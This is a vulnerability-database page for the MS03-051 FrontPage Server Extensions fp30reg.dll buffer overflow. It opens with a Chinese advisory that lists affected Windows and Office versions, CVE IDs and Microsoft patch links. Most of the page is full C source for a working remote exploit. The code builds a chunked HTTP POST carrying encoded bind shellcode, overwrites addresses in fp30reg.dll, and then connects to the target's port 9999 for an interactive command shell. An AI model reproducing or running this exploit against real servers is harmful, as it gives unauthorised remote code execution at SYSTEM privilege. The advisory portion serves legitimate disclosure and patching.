MS Frontpage Server Extensions fp30reg.dll Exploit (MS03-051)

2003-11-13T00:00:00
ID SSV:13803
Type seebug
Reporter Root
Modified 2003-11-13T00:00:00

Description

<p><strong>漏洞描述:</strong></p><p>Microsoft FrontPage服务器扩展是Microsoft公司开发的用于加强IIS Web服务器的功能的软件包。Microsoft FrontPage Server Extensions存在两个新的安全漏洞,可导致远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以FrontPage进程权限在系统上执行任意指令。 第一个漏洞是由于FrontPage服务扩展的远程调试功能上存在缓冲区溢出,这个功能用于用户远程连接FrontPage服务扩展的服务器和远程调试内容使用,如Visual Interdev。攻击者成功利用这个漏洞可以以本地SYSTEM权限在系统上执行任意指令,然后在系统上执行任意操作,如安装程序,查看更改或删除数据,建立拥有全部权限的帐户等。 第二个漏洞存在与SmartHTML解析器中,提供对WEB表单和其他基于FrontPage动态内容的支持,攻击者利用这个漏洞可以使运行FrontPage服务扩展的服务器临时停止对正常请求的响应。</p><p><strong>漏洞影响:</strong></p><p>受影响的系统:</p><p> •Microsoft Windows 2000 Service Pack 2, Service Pack 3</p><p>•Microsoft Windows XP, Microsoft Windows XP Service Pack 1</p><p>•Microsoft Windows XP 64-Bit Edition, Microsoft Windows XP 64-Bit Edition Service Pack 1</p><p>•Microsoft Office XP, Microsoft Office XP Service Pack 1, Service Pack 2</p><p>•Microsoft Office 2000 Server Extensions</p><p>不受影响的系统: </p><p>•Microsoft Windows Millennium Edition </p><p>•Microsoft Windows NT Workstation 4.0, Service Pack 6a </p><p>•Microsoft Windows NT Server 4.0, Service Pack 6a </p><p>•Microsoft Windows NT Server 4.0, Terminal Server Edition, Service Pack 6 </p><p>•Microsoft Windows 2000 Service Pack 4 </p><p>•Microsoft Windows XP 64-Bit Edition Version 2003 </p><p>•Microsoft Windows Server 2003 (Windows SharePoint Services) </p><p>•Microsoft Windows Server 2003 64-Bit Edition (Windows SharePoint Services)</p><p>•Microsoft Office System 2003 </p><p>Affected Components: </p><p>•Microsoft FrontPage Server Extensions 2000 (For Windows NT4) and Microsoft Office 2000 Server Extensions (Shipped with Office 2000)</p><p>•Microsoft FrontPage Server Extensions 2000 (Shipped with Windows 2000)</p><p>•Microsoft FrontPage Server Extensions 2000 (Shipped with Windows XP) </p><p>•Microsoft FrontPage Server Extensions 2000 64-bit (Shipped with Windows XP 64-bit)</p><p>•Microsoft FrontPage Server Extensions 2002 </p><p>•Microsoft SharePoint Team Services 2002 (Shipped with Office XP)</p><p><strong>CVE-ID:CVE-2003-0822,CVE-2003-0824 </strong></p><p><strong>CNNVD-ID:CNNVD-200312-061,CNNVD-200312-053</strong></p><p><strong>CNVD-ID:CNVD-2003-3292</strong> </p><p><strong></strong> </p><p><strong>解决方案:</strong></p><p>Microsoft </p><p>--------- </p><p>Microsoft已经为此发布了一个安全公告(MS03-051)以及相应补丁:</p><p>MS03-051:Buffer Overrun in Microsoft FrontPage Server Extensions Could Allow Code Execution (813360)链接:<a href="http://www.microsoft.com/technet/security/bulletin/MS03-051.asp">http://www.microsoft.com/technet/security/bulletin/MS03-051.asp</a></p><p>补丁下载:Microsoft FrontPage Server Extensions 2000 <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=C84C3D10-A821-4819-BF58-D3BC70A77BFA&displaylang=en">http://www.microsoft.com/downloads/details.aspx?FamilyId=C84C3D10-A821-4819-BF58-D3BC70A77BFA&displaylang=en</a> </p><p>Microsoft FrontPage Server Extensions 2000 (Shipped with Windows 2000) <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=057D5F0E-0E2B-47D2-9F0F-3B15DD8622A2&displaylang=en">http://www.microsoft.com/downloads/details.aspx?FamilyId=057D5F0E-0E2B-47D2-9F0F-3B15DD8622A2&displaylang=en</a> </p><p>Microsoft FrontPage Server Extensions 2000 (Shipped with Windows XP) <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=9B302532-BFAB-489B-82DC-ED1E49A16E1C&displaylang=en">http://www.microsoft.com/downloads/details.aspx?FamilyId=9B302532-BFAB-489B-82DC-ED1E49A16E1C&displaylang=en</a> </p><p>Microsoft FrontPage Server Extensions 2002 <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=3E8A21D9-708E-4E69-8299-86C49321EE25&displaylang=en">http://www.microsoft.com/downloads/details.aspx?FamilyId=3E8A21D9-708E-4E69-8299-86C49321EE25&displaylang=en</a> </p><p>Microsoft SharePoint Team Services 2002 (shipped with Office XP) <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=5923FC2F-D786-4E32-8F15-36A1C9E0A340&displaylang=en">http://www.microsoft.com/downloads/details.aspx?FamilyId=5923FC2F-D786-4E32-8F15-36A1C9E0A340&displaylang=en</a></p>

                                        
                                            
                                                /*******************************************************************************

Frontpage fp30reg.dll Overflow (MS03-051) discovered by Brett Moore

Exploit by Adik netmaniac hotmail kg

Binds persistent command shell on port 9999
Tested on 			
		Windows 2000 Professional SP3 English version 
		(fp30reg.dll ver 4.0.2.5526)			

-[ 13/Nov/2003 ]-
********************************************************************************/


#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
#include &lt;winsock.h&gt;
#pragma comment(lib,&quot;ws2_32&quot;)

#define VER		&quot;0.1&quot;	

/******** bind shellcode spawns persistent shell on port 9999 *****************************/
unsigned char kyrgyz_bind_code[] = {
	0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,
	0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,
	0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88, 
	0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88, 
	0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE, 
	0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88, 
	0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88, 
	0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88, 
	0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88, 
	0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88, 
	0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88, 
	0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88, 
	0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88, 
	0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88, 
	0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89, 
	0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78, 
	0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77, 
	0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03, 
	0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05, 
	0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98, 
	0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC, 
	0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77, 
	0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03, 
	0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8, 
	0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C, 
	0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0, 
	0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03, 
	0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B, 
	0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03, 
	0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48, 
	0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88
};

void cmdshell (int sock);
long gimmeip(char *hostname);

int main(int argc,char *argv[])
{     
		WSADATA wsaData;
		struct sockaddr_in targetTCP;
		struct hostent *host;
		int sockTCP,s;
		unsigned short port = 80;
		long ip;
		unsigned char header[]=	&quot;POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n&quot;;
                                unsigned char packet[3000],data[1500];		                
		unsigned char ecx[] = &quot;\xe0\xf3\xd4\x67&quot;;
		unsigned char edi[] = &quot;\xff\xd0\x90\x90&quot;;		
		unsigned char call[] = &quot;\xe4\xf3\xd4\x67&quot;;//overwrite .data section of fp30reg.dll
		unsigned char shortjmp[] = &quot;\xeb\x10&quot;;
		
		printf(&quot;\n-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=-\n\n&quot;
		&quot; by Adik &lt; netmaniac [at] hotmail.KG &gt;\n\n&quot;, VER);
		if(argc &lt; 2)
		{
			
			printf(&quot; Usage: %s [Target] &lt;port&gt;\n&quot;
					&quot; eg: fp30reg.exe 192.168.63.130\n\n&quot;,argv[0]);
			return 1;			
		}		
		if(argc==3)
			port = atoi(argv[2]);					
        WSAStartup(0x0202, &amp;wsaData);				
		printf(&quot;[*] Target:\t%s \tPort: %d\n\n&quot;,argv[1],port);
		ip=gimmeip(argv[1]);	
        memset(&amp;targetTCP, 0, sizeof(targetTCP));
		memset(packet,0,sizeof(packet));
        targetTCP.sin_family = AF_INET;
        targetTCP.sin_addr.s_addr = ip;
        targetTCP.sin_port = htons(port);				
	sprintf(packet,&quot;%sHost: %s\r\nTransfer-Encoding: chunked\r\n&quot;,header,argv[1]);		
	memset(data, 0x90, sizeof(data)-1);
	data[sizeof(data)-1] = '\x0';
	memcpy(&amp;data[16],edi,sizeof(edi)-1);
	memcpy(&amp;data[20],ecx,sizeof(ecx)-1);		
	memcpy(&amp;data[250+10],shortjmp,sizeof(shortjmp)-1);
	memcpy(&amp;data[250+14],call,sizeof(call)-1);		
	memcpy(&amp;data[250+70],kyrgyz_bind_code,sizeof(kyrgyz_bind_code));
	sprintf(packet,&quot;%sContent-Length: %d\r\n\r\n%x\r\n%s\r\n0\r\n\r\n&quot;,packet,strlen(data),strlen(data),data);
        if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
		{
				printf(&quot;[x] Socket not initialized! Exiting...\n&quot;);
				WSACleanup();
                return 1;
		}
		printf(&quot;[*] Socket initialized...\n&quot;);					
		if(connect(sockTCP,(struct sockaddr *)&amp;targetTCP, sizeof(targetTCP)) != 0)
		{
			printf(&quot;[*] Connection to host failed! Exiting...\n&quot;);
			WSACleanup();
			exit(1);
		} 		
		printf(&quot;[*] Checking for presence of fp30reg.dll...&quot;);
		if (send(sockTCP, packet, strlen(packet),0) == -1)
		{
				printf(&quot;[x] Failed to inject packet! Exiting...\n&quot;);
				WSACleanup();
                return 1;
		}		
		memset(packet,0,sizeof(packet));	
		if (recv(sockTCP, packet, sizeof(packet),0) == -1)		
		{
				printf(&quot;[x] Failed to receive packet! Exiting...\n&quot;);
				WSACleanup();
                return 1;
		}				
		if(packet[9]=='1' &amp;&amp; packet[10]=='0' &amp;&amp; packet[11]=='0')
			printf(&quot; Found!\n&quot;);
		else
		{
			printf(&quot; Not Found!! Exiting...\n&quot;);
			WSACleanup();
			return 1;
		}
		printf(&quot;[*] Packet injected!\n&quot;);
		closesocket(sockTCP);
		printf(&quot;[*] Sleeping &quot;);
		for(s=0;s&lt;13000;s+=1000)
		{
			printf(&quot;. &quot;);
			Sleep(1000);
		}		
		printf(&quot;\n[*] Connecting to host: %s on port 9999&quot;,argv[1]);
		if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
		{
				printf(&quot;\n[x] Socket not initialized! Exiting...\n&quot;);
				WSACleanup();
                return 1;
		}		
		targetTCP.sin_family = AF_INET;
        targetTCP.sin_addr.s_addr = ip;
        targetTCP.sin_port = htons(9999);
		if(connect(sockTCP,(struct sockaddr *)&amp;targetTCP, sizeof(targetTCP)) != 0)
		{
			printf(&quot;\n[x] Exploit failed or there is a Firewall! Exiting...\n&quot;);
			WSACleanup();
			exit(1);
		} 
		printf(&quot;\n[*] Dropping to shell...\n\n&quot;);
		cmdshell(sockTCP);
        return 0;
}
/*********************************************************************************/
void cmdshell (int sock)
{
 struct timeval tv;
 int length;
 unsigned long o[2];
 char buffer[1000];
 
 tv.tv_sec = 1;
 tv.tv_usec = 0;

 while (1) 
 {
	o[0] = 1;
	o[1] = sock;	

	length = select (0, (fd_set *)&amp;o, NULL, NULL, &amp;tv);
	if(length == 1)
	{
		length = recv (sock, buffer, sizeof (buffer), 0);
		if (length &lt;= 0) 
		{
			printf (&quot;[x] Connection closed.\n&quot;);
			WSACleanup();
			return;
		}
		length = write (1, buffer, length);
		if (length &lt;= 0) 
		{
			printf (&quot;[x] Connection closed.\n&quot;);
			WSACleanup();
			return;
		}
	}
	else
	{
		length = read (0, buffer, sizeof (buffer));
		if (length &lt;= 0) 
		{
			printf(&quot;[x] Connection closed.\n&quot;);
			WSACleanup();
			return;
		}
		length = send(sock, buffer, length, 0);
		if (length &lt;= 0) 
		{
			printf(&quot;[x] Connection closed.\n&quot;);
			WSACleanup();
			return;
		}
	}
}

}
/*********************************************************************************/
long gimmeip(char *hostname) 
{
	struct hostent *he;
	long ipaddr;
	
	if ((ipaddr = inet_addr(hostname)) &lt; 0) 
	{
		if ((he = gethostbyname(hostname)) == NULL) 
		{
			printf(&quot;[x] Failed to resolve host: %s! Exiting...\n\n&quot;,hostname);
			WSACleanup();
			exit(1);
		}
		memcpy(&amp;ipaddr, he-&gt;h_addr, he-&gt;h_length);
	}	
	return ipaddr;
}
/*********************************************************************************/

// sebug.net